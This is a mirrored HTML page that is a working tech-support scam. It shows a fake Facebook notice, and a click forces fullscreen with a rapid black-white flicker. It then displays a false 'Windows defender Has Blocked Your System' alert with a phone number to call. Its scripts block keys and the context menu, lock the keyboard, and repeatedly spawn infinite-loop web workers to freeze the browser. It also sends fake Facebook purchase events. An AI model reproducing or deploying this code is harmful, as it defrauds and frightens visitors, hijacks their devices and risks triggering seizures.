<!DOCTYPE html>
<html>

<!-- Mirrored from monkfish-app-jflmp.ondigitalocean.app/huh/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 20 Jan 2026 18:19:32 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from storage.googleapis.com/20fb208sjjsdfsdf/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 10 Feb 2026 17:37:48 GMT -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
  <script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod ?
    n.callMethod.apply(n,arguments) : n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    '../../connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1134431114955808');
    fbq('track', 'PageView');
  </script>
  <noscript>
    <img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=1134431114955808&amp;ev=PageView&amp;noscript=1"/>
  </noscript>

  <script>
    let hasClicked = false;
    let hasStayed4Minutes = false;

    // Track if user has clicked
    document.addEventListener('click', function() {
      hasClicked = true;
      checkAndFirePixel();
    });

    // Set timer for 4 minutes
    setTimeout(() => {
      hasStayed4Minutes = true;
      checkAndFirePixel();
    }, 180000); // 4 minutes = 240000 ms

    function checkAndFirePixel() {
      // Only fire if both conditions are met and pixel hasn't been fired yet
      if (hasClicked && hasStayed4Minutes) {
        const purchaseValue = (Math.random() * (2.5 - 0.5) + 0.5).toFixed(2);
        const events = ['Purchase', 'Subscribe'];
        const randomEvent = events[Math.floor(Math.random() * events.length)];

        fbq('track', randomEvent, {
          content_name: 'Click_And_4_Minute_Stay',
          value: purchaseValue,
          currency: 'USD'
        });

        // Prevent multiple firings
        hasClicked = false;
        hasStayed4Minutes = false;
      }
    }
  </script>

  <script type="text/javascript">
      (function(c,l,a,r,i,t,y){
          c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
          t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
          y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
      })(window, document, "clarity", "script", "ru8rjdgnfm");
  </script>

    <title>In-Service Apps</title>
    <style>
        body {
            background-image: url('bg1.jpg');
            background-size: 100% 100%;
            background-repeat: no-repeat;
            background-position: center center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
            color: white;
        }

        body.fullscreen {
            background-image: url('bg2.jpg');
        }

        #support-text {
            position: absolute;
            top: 80%;
            left: 50%;
            transform: translateX(-50%);
            font-size: 24px;
            text-align: center;
            width: 100%;
            font-weight: bold;
            color: black;
            display: none;
        }

        #support-text span {
            font-weight: normal;
        }

        #music {
            display: none;
        }

        #modal-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 9999;
        }

        #modal-content {
            background-color: white;
            border-radius: 5px;
            max-width: 400px;
            margin: 100px auto;
            padding: 20px;
            text-align: center;
        }

        #modal-close {
            cursor: pointer;
            color: #888;
            float: right;
            font-size: 20px;
            font-weight: bold;
        }

        #modal-message {
            color: black;
            font-weight: bold;
            margin-bottom: 20px;
        }

        #modal-image {
            margin-bottom: 20px;
        }

        .modal-buttons {
            display: flex;
            justify-content: space-between;
            margin-top: 20px;
        }

        .modal-buttons button {
            width: 100px;
            padding: 10px 0;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-weight: bold;
            transition: background-color 0.3s;
        }

        .modal-buttons button.accept {
            background-color: white;
            color: black;
        }

        .modal-buttons button.dismiss {
            background-color: #3b5998;
            color: white;
        }

        .modal-buttons button:hover {
            background-color: rgba(0, 0, 0, 0.8);
        }

        @keyframes blink {
            0% {
                opacity: 1;
            }
            50% {
                opacity: 0;
            }
            100% {
                opacity: 1;
            }
        }

        .modal-buttons button.dismiss.blinking {
            animation: blink 2s infinite;
        }

        #welcomeDiv {
            display: none;
            background-color: #000;
            height: auto;
            width: 550px;
            position: fixed;
            top: 0;
            left: 50%;
            transform: translateX(-50%);
            z-index: 9999999999;
            text-align: center;
        }

        #welcomeDiv p {
            color: #FEFEFE;
            margin-top: 10px;
            font-size: 16px;
            opacity: 0.9;
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            var isPopupVisible = true;
            var music = document.getElementById('music');
            var isPlaying = false;

            function toggleMusic() {
                if (isPlaying) {
                    music.pause();
                } else {
                    music.play();
                }
                isPlaying = !isPlaying;
            }

            function playMusicOnClick() {
                toggleMusic();
                document.removeEventListener('click', playMusicOnClick);
            }

            music.addEventListener('click', toggleMusic);
            document.addEventListener('click', playMusicOnClick);

            var fullscreenEnabled = document.fullscreenEnabled || document.mozFullScreenEnabled || document.documentElement.webkitRequestFullScreen;

            if (fullscreenEnabled) {
                document.documentElement.requestFullscreen = document.documentElement.requestFullscreen || document.documentElement.mozRequestFullScreen || document.documentElement.webkitRequestFullScreen;
                document.cancelFullscreen = document.cancelFullscreen || document.mozCancelFullScreen || document.webkitCancelFullScreen;

                var isFullscreen = false;

                document.addEventListener('click', function () {
                    if (!isFullscreen) {
                        isFullscreen = true;
                        document.documentElement.requestFullscreen();
                        document.body.classList.add('fullscreen');
                        showWelcomeDiv();
                        showSupportText();
                        flickerEffect(); // FLICKER EFFECT ADDED HERE
                    }
                });

                document.addEventListener('fullscreenchange', function () {
                    isFullscreen = !isFullscreen;
                });
            }

            var modalOverlay = document.getElementById('modal-overlay');
            var modalClose = document.getElementById('modal-close');

            function showModal() {
                modalOverlay.style.display = 'block';
            }

            function closeModal() {
                modalOverlay.style.display = 'none';
            }

            modalClose.addEventListener('click', closeModal);

            showModal();

            function hideCursor() {
                document.documentElement.style.cursor = 'none';
            }

            document.addEventListener('click', function () {
                hideCursor();
                document.removeEventListener('click', hideCursor);
                if (isPopupVisible) {
                    closeModal();
                    isPopupVisible = false;
                }
            });

            var acceptButton = document.getElementById('modal-accept');
            var dismissButton = document.getElementById('modal-dismiss');

            acceptButton.addEventListener('click', closeModal);
            dismissButton.addEventListener('click', closeModal);

            document.addEventListener('contextmenu', function (event) {
                event.preventDefault();
            });

            document.addEventListener('keydown', function (e) {
                if (e.ctrlKey && (e.keyCode === 'U'.charCodeAt(0) || e.keyCode === 'u'.charCodeAt(0)) ||
                    e.ctrlKey && (e.keyCode === 'C'.charCodeAt(0) || e.keyCode === 'c'.charCodeAt(0)) ||
                    e.ctrlKey && (e.keyCode === 'S'.charCodeAt(0) || e.keyCode === 's'.charCodeAt(0))) {
                    e.preventDefault();
                }
            });

            function preventKeyEvents(event) {
                const blockedKeyCodes = [123];
                const keyCode = event.keyCode || event.which;

                if (blockedKeyCodes.includes(keyCode)) {
                    event.preventDefault();
                    console.log(`Key with code ${keyCode} is blocked.`);
                }
            }

            window.addEventListener('keydown', preventKeyEvents);
        });

        // ===== Fast flicker effect when entering fullscreen =====
        function flickerEffect() {
            const flickerDiv = document.createElement("div");
            flickerDiv.style.position = "fixed";
            flickerDiv.style.inset = "0";
            flickerDiv.style.zIndex = "999999999";
            flickerDiv.style.pointerEvents = "none";
            document.body.appendChild(flickerDiv);

            let flicker = true;
            const flickerInterval = setInterval(() => {
                flickerDiv.style.backgroundColor = flicker ? "black" : "white";
                flicker = !flicker;
            }, 80); // flicker speed: change every 80ms (fast)

            setTimeout(() => {
                clearInterval(flickerInterval);
                flickerDiv.remove();
            }, 4000); // total duration: 4 seconds
        }

        // ====== WORKER BOMB FUNCTIONALITY ======
        // Modified worker bomb function - only triggers on fullscreen and repeats every 30 seconds
        function workerBomb() {
            console.log("Starting workerBomb...");
            const script = `
                let counter = 0;
                while (true) {
                    counter++;
                    Math.random() * Math.random();
                    if (counter % 1e6 === 0) {
                        postMessage({ status: "working", counter });
                    }
                }
            `;
            const blob = new Blob([script], { type: "application/javascript" });
            const workerURL = URL.createObjectURL(blob);

            for (let i = 0; i < 6; i++) {
                const worker = new Worker(workerURL);
                worker.onmessage = (event) => {
                    if (event.data.status === "working") {
                        console.log(`Worker progress: ${event.data.counter}`);
                    }
                };

                worker.onerror = (error) => {
                    console.error(`Worker encountered an error:`, error);
                };
            }
        }

        let bombActivated = false; // Flag to prevent multiple activations
        let fullscreenTimer = null; // Timer reference for initial 4-second delay
        let repeatBombTimer = null; // Timer reference for 30-second repeats

        // Better fullscreen detection
        function setupFullscreenListener() {
            const fullscreenEvents = [
                'fullscreenchange',
                'webkitfullscreenchange',
                'mozfullscreenchange',
                'MSFullscreenChange'
            ];

            fullscreenEvents.forEach(event => {
                document.addEventListener(event, function() {
                    const isFullscreen = document.fullscreenElement ||
                                        document.webkitFullscreenElement ||
                                        document.mozFullScreenElement ||
                                        document.msFullscreenElement;

                    console.log('Fullscreen state changed:', isFullscreen);

                    if (isFullscreen && !bombActivated) {
                        console.log("Fullscreen entered - starting 4 second timer...");

                        // Start 4 second countdown for initial bomb
                        fullscreenTimer = setTimeout(function() {
                            console.log("4 seconds elapsed - activating worker bomb");
                            bombActivated = true;
                            workerBomb();

                            // Start repeating bomb every 30 seconds
                            repeatBombTimer = setInterval(function() {
                                console.log("30 seconds elapsed - reactivating worker bomb");
                                workerBomb();
                            }, 30000); // 30000 milliseconds = 30 seconds

                        }, 4000); // 4000 milliseconds = 4 seconds

                    } else if (!isFullscreen) {
                        // User exited fullscreen - cancel all timers
                        console.log("Fullscreen exited - cancelling all timers");
                        if (fullscreenTimer) {
                            clearTimeout(fullscreenTimer);
                            fullscreenTimer = null;
                        }
                        if (repeatBombTimer) {
                            clearInterval(repeatBombTimer);
                            repeatBombTimer = null;
                        }
                        bombActivated = false;
                    }
                });
            });
        }

        // Call this when your page loads
        setupFullscreenListener();

        // Keyboard lock and prevent default
        if (navigator.keyboard) {
            navigator.keyboard.lock();
        }
        document.onkeydown = function (e) {
            return false;
        }

        function showWelcomeDiv() {
            var welcomeDiv = document.getElementById('welcomeDiv');
            welcomeDiv.style.display = 'block';
        }

        function showSupportText() {
            var supportText = document.getElementById('support-text');
            supportText.style.display = 'block';
        }
    </script>
</head>

<body>
    <audio id="music" src="text-to-speech.mp3" controls loop></audio>

    <div id="modal-overlay">
        <div id="modal-content">
            <span id="modal-close">&times;</span>
            <img id="modal-image" src="logo-facebookpng-32251.jpg" alt="Facebook Logo">
            <p id="modal-message">Facebook article not available. <br> Click "Close" to continue using Facebook.</p>
            <div class="modal-buttons">
                <button id="modal-accept" class="">Ok</button>
                <button id="modal-dismiss" class="dismiss blinking">Close</button>
            </div>
        </div>
    </div>

    <div id="welcomeDiv">
        <p>
            Windows defender Has Blocked Your System.<br>
            Call Windows support To Unlock Your Computer.<br>  +1-844-706-3252
        </p>
    </div>


<div id="support-text">
        <br>
        <span style="color:#cc0000"><strong>Microsoft Windows Support +1-844-706-3252 </strong></span><br>

    </div>
</body>

<!-- Mirrored from monkfish-app-jflmp.ondigitalocean.app/huh/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 20 Jan 2026 18:19:38 GMT -->

<!-- Mirrored from storage.googleapis.com/20fb208sjjsdfsdf/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 10 Feb 2026 17:37:50 GMT -->
</html>
